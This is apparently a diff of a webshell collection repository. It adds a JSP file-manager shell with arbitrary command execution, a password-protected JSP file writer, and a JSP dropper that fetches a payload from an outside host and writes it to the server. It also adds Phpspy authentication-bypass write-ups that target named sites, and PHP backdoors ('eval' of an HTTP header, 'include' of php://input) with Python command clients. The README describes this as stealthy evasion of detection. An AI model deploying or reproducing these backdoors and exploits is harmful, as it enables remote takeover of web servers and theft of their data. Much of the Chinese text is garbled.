byte[] buffer=new byte[1024];
|
||||
int c;
|
||||
while((c=in1.read(buffer))!=-1)
|
||||
{
|
||||
out1.write(buffer,0,c);
|
||||
}
|
||||
in1.close();
|
||||
out1.close();
|
||||
|
||||
sbSaveCopy.append("???????? ??"+strPath+"<p>");
|
||||
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
|
||||
sbSaveCopy.append("<font color=red>??????????</font>");
|
||||
}
|
||||
}
|
||||
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("newFile"))
|
||||
{
|
||||
String strF=request.getParameter("fileName");
|
||||
String strType1=request.getParameter("btnNewFile");
|
||||
String strType2=request.getParameter("btnNewDir");
|
||||
String strType="";
|
||||
if(strType1==null)
|
||||
{
|
||||
strType="Dir";
|
||||
}
|
||||
else if(strType2==null)
|
||||
{
|
||||
strType="File";
|
||||
}
|
||||
if(!strType.equals("") && !(strF==null || strF.equals("")))
|
||||
{
|
||||
File f_new=new File(strF);
|
||||
if(strType.equals("File") && !f_new.createNewFile())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
if(strType.equals("Dir") && !f_new.mkdirs())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
}
|
||||
}
|
||||
|
||||
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
|
||||
{
|
||||
String tempdir=".";
|
||||
boolean error=false;
|
||||
response.setContentType("text/html");
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
HttpMultiPartParser parser = new HttpMultiPartParser();
|
||||
|
||||
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||||
String bound = request.getContentType().substring(bstart + 8);
|
||||
int clength = request.getContentLength();
|
||||
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
|
||||
if (ht.get("cqqUploadFile") != null)
|
||||
{
|
||||
|
||||
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
|
||||
File f1 = fi.file;
|
||||
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
|
||||
if (info != null && info.aborted)
|
||||
{
|
||||
f1.delete();
|
||||
request.setAttribute("error", "Upload aborted");
|
||||
}
|
||||
else
|
||||
{
|
||||
String path = (String) ht.get("path");
|
||||
if(path!=null && !path.endsWith("\\"))
|
||||
path = path + "\\";
|
||||
if (!f1.renameTo(new File(path + f1.getName())))
|
||||
{
|
||||
request.setAttribute("error", "Cannot upload file.");
|
||||
error = true;
|
||||
f1.delete();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
td,select,input,body{font-size:9pt;}
|
||||
A { TEXT-DECORATION: none }
|
||||
|
||||
#tablist{
|
||||
padding: 5px 0;
|
||||
margin-left: 0;
|
||||
margin-bottom: 0;
|
||||
margin-top: 0.1em;
|
||||
font:9pt;
|
||||
}
|
||||
|
||||
#tablist li{
|
||||
list-style: none;
|
||||
display: inline;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
#tablist li a{
|
||||
padding: 3px 0.5em;
|
||||
margin-left: 3px;
|
||||
border: 1px solid ;
|
||||
background: F6F6F6;
|
||||
}
|
||||
|
||||
#tablist li a:link, #tablist li a:visited{
|
||||
color: navy;
|
||||
}
|
||||
|
||||
#tablist li a.current{
|
||||
background: #EAEAFF;
|
||||
}
|
||||
|
||||
#tabcontentcontainer{
|
||||
width: 100%;
|
||||
padding: 5px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
|
||||
.tabcontent{
|
||||
display:none;
|
||||
}
|
||||
|
||||
</style>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
|
||||
|
||||
////////Stop editting////////////////
|
||||
|
||||
function cascadedstyle(el, cssproperty, csspropertyNS){
|
||||
if (el.currentStyle)
|
||||
return el.currentStyle[cssproperty]
|
||||
else if (window.getComputedStyle){
|
||||
var elstyle=window.getComputedStyle(el, "")
|
||||
return elstyle.getPropertyValue(csspropertyNS)
|
||||
}
|
||||
}
|
||||
|
||||
var previoustab=""
|
||||
|
||||
function expandcontent(cid, aobject){
|
||||
if (document.getElementById){
|
||||
highlighttab(aobject)
|
||||
if (previoustab!="")
|
||||
document.getElementById(previoustab).style.display="none"
|
||||
document.getElementById(cid).style.display="block"
|
||||
previoustab=cid
|
||||
if (aobject.blur)
|
||||
aobject.blur()
|
||||
return false
|
||||
}
|
||||
else
|
||||
return true
|
||||
}
|
||||
|
||||
function highlighttab(aobject){
|
||||
if (typeof tabobjlinks=="undefined")
|
||||
collecttablinks()
|
||||
for (i=0; i<tabobjlinks.length; i++)
|
||||
tabobjlinks[i].style.backgroundColor=initTabcolor
|
||||
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
|
||||
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
|
||||
}
|
||||
|
||||
function collecttablinks(){
|
||||
var tabobj=document.getElementById("tablist")
|
||||
tabobjlinks=tabobj.getElementsByTagName("A")
|
||||
}
|
||||
|
||||
function do_onload(){
|
||||
collecttablinks()
|
||||
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
|
||||
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
|
||||
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
|
||||
}
|
||||
|
||||
if (window.addEventListener)
|
||||
window.addEventListener("load", do_onload, false)
|
||||
else if (window.attachEvent)
|
||||
window.attachEvent("onload", do_onload)
|
||||
else if (document.getElementById)
|
||||
window.onload=do_onload
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
<script language="javascript">
|
||||
|
||||
function doForm(action,path,file,cmd,tab,content)
|
||||
{
|
||||
document.frmCqq.action.value=action;
|
||||
document.frmCqq.path.value=path;
|
||||
document.frmCqq.file.value=file;
|
||||
document.frmCqq.cmd.value=cmd;
|
||||
document.frmCqq.tabID.value=tab;
|
||||
document.frmCqq.content.value=content;
|
||||
if(action=="del")
|
||||
{
|
||||
if(confirm("?·?¨?????????? "+file+" ????"))
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
else
|
||||
{
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
<title>JSP Shell ·?°??????ú</title>
|
||||
<head>
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<form name="frmCqq" method="post" action="">
|
||||
<input type="hidden" name="action" value="">
|
||||
<input type="hidden" name="path" value="">
|
||||
<input type="hidden" name="file" value="">
|
||||
<input type="hidden" name="cmd" value="">
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type="hidden" name="content" value="">
|
||||
</form>
|
||||
|
||||
<!--Top Menu Started-->
|
||||
<ul id="tablist">
|
||||
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
|
||||
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
|
||||
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
|
||||
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
|
||||
<%=authorInfo[languageNo]%>
|
||||
</ul>
|
||||
<!--Top Menu End-->
|
||||
|
||||
|
||||
<%
|
||||
StringBuffer sbFolder=new StringBuffer("");
|
||||
StringBuffer sbFile=new StringBuffer("");
|
||||
try
|
||||
{
|
||||
File objFile = new File(strDir);
|
||||
File list[] = objFile.listFiles();
|
||||
if(objFile.getAbsolutePath().length()>3)
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
|
||||
|
||||
|
||||
}
|
||||
for(int i=0;i<list.length;i++)
|
||||
{
|
||||
if(list[i].isDirectory())
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td>");
|
||||
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strLen="";
|
||||
String strDT="";
|
||||
long lFile=0;
|
||||
lFile=list[i].length();
|
||||
strLen = convertFileSize(lFile);
|
||||
Date dt=new Date(list[i].lastModified());
|
||||
strDT=dt.toLocaleString();
|
||||
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
|
||||
sbFile.append(""+list[i].getName());
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strLen);
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strDT);
|
||||
sbFile.append("</td><td>");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileEdit[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDel[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDown[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileCopy[languageNo]+"</a> ");
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
|
||||
}
|
||||
%>
|
||||
|
||||
<DIV id="tabcontentcontainer">
|
||||
|
||||
|
||||
<div id="menu3" class="tabcontent">
|
||||
<br>
|
||||
<br> ???ê??
|
||||
<br>
|
||||
<br>
|
||||
|
||||
</div>
|
||||
|
||||
<div id="menu4" class="tabcontent">
|
||||
<br>
|
||||
<p>???????????÷</p>
|
||||
<p> jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
|
||||
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
|
||||
<p>??windows??cmd??</p>
|
||||
<p> </p>
|
||||
<p>????????</p>
|
||||
<p> <b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
|
||||
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
|
||||
<p> </p>
|
||||
<p>?????ü??????</p>
|
||||
<p> 2004.11.15 V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
|
||||
<p> 2004.10.27 ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
|
||||
<p> 2004.09.20 ??????jsp ???ò?????????ò???????????????????????ò</p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="menu1" class="tabcontent">
|
||||
<%
|
||||
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
|
||||
%>
|
||||
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
|
||||
|
||||
<tr>
|
||||
<td width="25%" align="center" valign="top">
|
||||
<table width="98%" border="0" cellspacing="0" cellpadding="3">
|
||||
<%=sbFolder%>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="81%" align="left" valign="top">
|
||||
|
||||
<%
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
out.println(sbEdit.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
out.println(sbCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
out.println(sbDown.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
out.println(sbSaveCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
|
||||
{
|
||||
out.println(sbNewFile.toString());
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
|
||||
<tr bgcolor="#E7e7e6">
|
||||
<td width="26%"><%=strFileName[languageNo]%></td>
|
||||
<td width="19%"><%=strFileSize[languageNo]%></td>
|
||||
<td width="29%"><%=strLastModified[languageNo]%></td>
|
||||
<td width="26%"><%=strFileOperation[languageNo]%></td>
|
||||
</tr>
|
||||
<%=sbFile%>
|
||||
<!-- <tr align="center">
|
||||
<td colspan="4"><br>
|
||||
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
|
||||
KB </td>
|
||||
</tr>
|
||||
-->
|
||||
</table>
|
||||
</span>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<form name="frmMake" action="" method="post">
|
||||
<tr><td colspan=2 bgcolor=#FBFFC6>
|
||||
<input type="hidden" name="action" value="newFile">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<%
|
||||
if(!strDir.endsWith("\\"))
|
||||
strDir = strDir + "\\";
|
||||
%>
|
||||
<input type="text" name="fileName" size=36 value="<%=strDir%>">
|
||||
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
|
||||
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
|
||||
</form>
|
||||
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="action" value="upload">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<input type="file" name="cqqUploadFile" size="36">
|
||||
<input type="submit" name="submit" value="????">
|
||||
</td></tr></form>
|
||||
</table>
|
||||
</div>
|
||||
<div id="menu2" class="tabcontent">
|
||||
|
||||
<%
|
||||
String line="";
|
||||
StringBuffer sbCmd=new StringBuffer("");
|
||||
|
||||
if(strCmd!=null)
|
||||
{
|
||||
try
|
||||
{
|
||||
//out.println(strCmd);
|
||||
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbCmd.append(line+"\r\n");
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
System.out.println(e.toString());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
strCmd = "set";
|
||||
}
|
||||
|
||||
%>
|
||||
<form name="cmd" action="" method="post">
|
||||
|
||||
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
|
||||
</form>
|
||||
<%
|
||||
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
|
||||
{
|
||||
%>
|
||||
<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
|
||||
<br>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
</DIV>
|
||||
</div>
|
||||
<br><br>
|
||||
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
|
||||
<br>Email:121208099#qq.com
|
1
jsp/guige02.jsp
Normal file
1
jsp/guige02.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private String password="734303";//??¡¤????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#ffffff"><%String act="";String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String url2=request.getRealPath(request.getServletPath());try{act=request.getParameter("act").toString();}catch(Exception e){}if(request.getSession().getAttribute("hehe")!=null){if(request.getSession().getAttribute("hehe").toString().equals("hehe")){if (path!=null && !path.equals("") && content!=null && !content.equals("")){ try{ File newfile=new File(path); PrintWriter writer=new PrintWriter(newfile); writer.println(content); writer.close(); if (newfile.exists() && newfile.length()>0) { out.println("<font size=3 color=red>save ok!</font>"); }else{ out.println("<font size=3 color=red>save erry!</font>"); } }catch(Exception e) { e.printStackTrace(); }}out.println("<form action="+url+" method=post>");out.println("<font size=3><br></font><input type=text size=54 name='path'><br>");out.println("<font size=3 color=red>"+url2+"</font><br>");out.println("<textarea name='content' rows=15 cols=50></textarea><br>");out.println("<input type='submit' value='save!'>");out.println("</form>");}}else{out.println("<div align='center'><form action='?act=login' method='post'>");out.println("<input type='password' name='pass'/>");out.println("<input type='submit' name='update' class='unnamed1' value='Login' />");out.println("</form></div>");}if(act.equals("login")){ String pass=request.getParameter("pass"); if(pass.equals(password)) { session.setAttribute("hehe","hehe"); String uri=request.getRequestURI(); uri=uri.substring(uri.lastIndexOf("/")+1); response.sendRedirect(uri); }else {out.println("Error");out.println("<a href='javascript:history.go(-1)'><font color='red'>go back</font></a></div><br>"); } }%></body></html>
|
1
jsp/web02.jsp
Normal file
1
jsp/web02.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[4096];int c=0;while((c=i.read(b))>0){o.write(b,0,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","1");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%>
|
28
php/Phpspy 2010 身份验证绕过漏洞
Normal file
28
php/Phpspy 2010 身份验证绕过漏洞
Normal file
|
@ -0,0 +1,28 @@
|
|||
Phpspy 2010 身份验证绕过漏洞
|
||||
作者:我不知道该唱什么 发布时间:April 17, 2011 00:21:28 分类:tech
|
||||
|
||||
|
||||
利用代码:
|
||||
|
||||
<form method="POST" action="http://mirc.3est.com/1.php">
|
||||
<input type="hidden" name="admin['pass']" value="1">
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
|
||||
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
|
||||
形成原因:
|
||||
2009不存在该洞,仅限2010版本,对比二者即可得到答案:
|
||||
利用
|
||||
|
||||
foreach(array('_GET','_POST') as $_request) {
|
||||
foreach($$_request as $_key => $_value) {
|
||||
if ($_key{0} != '_') {
|
||||
if (IS_GPC) {
|
||||
$_value = s_array($_value);
|
||||
}
|
||||
$$_key = $_value;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
对变量$admin['pass']进行覆盖。
|
43
php/Phpspy 2011 继续身份验证绕过漏洞
Normal file
43
php/Phpspy 2011 继续身份验证绕过漏洞
Normal file
|
@ -0,0 +1,43 @@
|
|||
Phpspy 2011 继续身份验证绕过漏洞
|
||||
作者:我不知道该唱什么 发布时间:May 1, 2011 14:58:54 分类:tech
|
||||
|
||||
官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。
|
||||
|
||||
鄙视转载不留版权的,特别鄙视下那个什么hack情
|
||||
http://hi.baidu.com/5427518 / http://www.hackqing.com/
|
||||
我曾经还以为他是个人物。
|
||||
|
||||
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
|
||||
|
||||
发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。
|
||||
|
||||
但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:
|
||||
|
||||
下面给出一个更为直接的利用方法,上传你自己的新shell:
|
||||
|
||||
<form method="POST" action="http://www.hackshell.net/2011ok11.php">
|
||||
<input name="password" type="text" size="20" value="hackshell_net">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
<input type="hidden" name="action" value="login">
|
||||
<input type="submit" value="Login"></form>
|
||||
|
||||
点击Login,这步点登录后 是登录界面 继续操作下一步:
|
||||
<form method="POST" action="http://www.hackshell.net/2011ok.php">
|
||||
<input name="password" type="text" size="20" value="hackshell_net">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
|
||||
|
||||
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
|
||||
然后访问:
|
||||
<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
|
||||
<input name="password" type="password" size="20">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
|
||||
<input name="uploadfile" value="" type="file">
|
||||
<input name="doupfile" value="Upload" type="submit">
|
||||
<input name="uploaddir" value="D:/workspace/" type="hidden">
|
||||
<input name="dir" value="D:/workspace/" type="hidden">
|
||||
</form>
|
||||
|
||||
|
||||
其中把iploaddir的value改为phpinfo中看到的路径,上传shell。
|
41
php/php-sh/client.py
Normal file
41
php/php-sh/client.py
Normal file
|
@ -0,0 +1,41 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the backdoor which
|
||||
# uses HTTP CODE header for inserting code
|
||||
# Got the idea after seeing this sort of payload
|
||||
# dropped by a phpmyadmin exploit on rdot :)
|
||||
# Is also good to learn how to use urllib
|
||||
# and not be lazy arse with requests all of time!
|
||||
# Insecurety Research (2013) - insecurety.net
|
||||
import urllib2
|
||||
import sys
|
||||
|
||||
def usage(program):
|
||||
print "HTTP CODE Header Backdoor Command Shell"
|
||||
print "Usage: %s <Backdoor URL>" %(program)
|
||||
print "Example: %s http://www.test.com/webshell.php" %(program)
|
||||
sys.exit(0)
|
||||
|
||||
def main(args):
|
||||
try:
|
||||
if len(args) < 2:
|
||||
usage(args[0])
|
||||
|
||||
print "[+] Using %s as target" %(args[1])
|
||||
print "[!] Popping a shell, type 'exit' to quit"
|
||||
while True:
|
||||
opener = urllib2.build_opener()
|
||||
url = args[1]
|
||||
cmd = raw_input('~$ ')
|
||||
if cmd == "exit":
|
||||
sys.exit(0)
|
||||
else:
|
||||
code = "system('%s');" %(cmd)
|
||||
opener.addheaders.append(('Code', code))# %(str(code))
|
||||
urllib2.install_opener(opener)
|
||||
result = urllib2.urlopen(url).read()
|
||||
print result
|
||||
except Exception, e:
|
||||
print e
|
||||
|
||||
if __name__ == "__main__":
|
||||
main(sys.argv)
|
3
php/php-sh/server.php
Normal file
3
php/php-sh/server.php
Normal file
|
@ -0,0 +1,3 @@
|
|||
<?php
|
||||
eval(getenv('HTTP_CODE'));
|
||||
?>
|
53
php/phpkit-0.1a/README
Normal file
53
php/phpkit-0.1a/README
Normal file
|
@ -0,0 +1,53 @@
|
|||
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
|
||||
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
|
||||
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
|
||||
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
|
||||
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
|
||||
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
|
||||
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|
||||
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
|
||||
|
||||
phpkit-0.1a
|
||||
|
||||
Stealth PHP Backdooring Utility - Insecurety Research 2013
|
||||
|
||||
This is a simple kit to demonstrate a very effective way of
|
||||
backdooring a webserver running PHP.
|
||||
Essentially, it functions by parsing out any valid PHP code
|
||||
from raw HTTP POST data sent to it, and executing said PHP.
|
||||
|
||||
No eval() or other suspect calls are in the serverside script,
|
||||
the code is executed by the include() function. The php://input
|
||||
data stream (which is basically "anything sent via raw POST) is
|
||||
used to "capture" the raw POST data, and when parsed by include()
|
||||
the code sent is executed.
|
||||
|
||||
This allows for many things to be done, i.e. executing any PHP
|
||||
code you happen to write. The example client, phpkit.py, simply
|
||||
gives a "shell prompt" (non interactive, each command is executed
|
||||
in a new "context") on the victim server. It is trivial to write
|
||||
pretty much anything, I have also written "upload.py" which will
|
||||
be ready for the next release, which allows uploading arbritary
|
||||
files to the infected webserver.
|
||||
|
||||
USAGE:
|
||||
You upload "odd.php" to the target webserver by any means necessary.
|
||||
You then run ./phpkit.py <url to php file on server> and enjoy!
|
||||
|
||||
Example Use:
|
||||
[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
|
||||
|
||||
[+] URL in use: http://localhost/odd.php
|
||||
|
||||
shell:~$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
shell:~$ uname -a
|
||||
Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
|
||||
|
||||
shell:~$
|
||||
|
||||
Questions, comments, bug reports and abuse? infodox () insecurety.net
|
||||
|
||||
Licence: The do whatever you want with it, just don't rip code without
|
||||
giving credit licence.
|
10
php/phpkit-0.1a/odd.php
Normal file
10
php/phpkit-0.1a/odd.php
Normal file
|
@ -0,0 +1,10 @@
|
|||
// php://input based backdoor
|
||||
// uses include('php://input') to execute arbritary code
|
||||
// Any valid PHP code sent as raw POST data to backdoor is ran
|
||||
// overrides the php.ini settings using ini_set :)
|
||||
// Insecurety Research 2013 | insecurety.net
|
||||
<?php
|
||||
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
||||
// No eval() calls, no system() calls, nothing normally seen as malicious.
|
||||
include('php://input');
|
||||
?>
|
28
php/phpkit-0.1a/phpkit.py
Normal file
28
php/phpkit-0.1a/phpkit.py
Normal file
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twitter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 2):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
while True:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
payload = """<?php system('%s'); ?>""" %(cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
|
10
php/phpkit-0.2a/CHANGELOG
Normal file
10
php/phpkit-0.2a/CHANGELOG
Normal file
|
@ -0,0 +1,10 @@
|
|||
Changelog of phpkit development
|
||||
--
|
||||
0.1a - 07/01 (Jan)/2013 - Initial Commit
|
||||
0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
|
||||
Uses simple logic to choose the first one that works.
|
||||
Needs code cleanup soon, and implementation of exec() :)
|
||||
0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
|
||||
Preparing for the 0.2a release by finishing the upload client and writing
|
||||
documentation for it. Code is a lot cleaner now though. Still need to fix
|
||||
the bloody "test" function :/
|
100
php/phpkit-0.2a/README
Normal file
100
php/phpkit-0.2a/README
Normal file
|
@ -0,0 +1,100 @@
|
|||
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
|
||||
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
|
||||
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
|
||||
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
|
||||
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
|
||||
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
|
||||
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|
||||
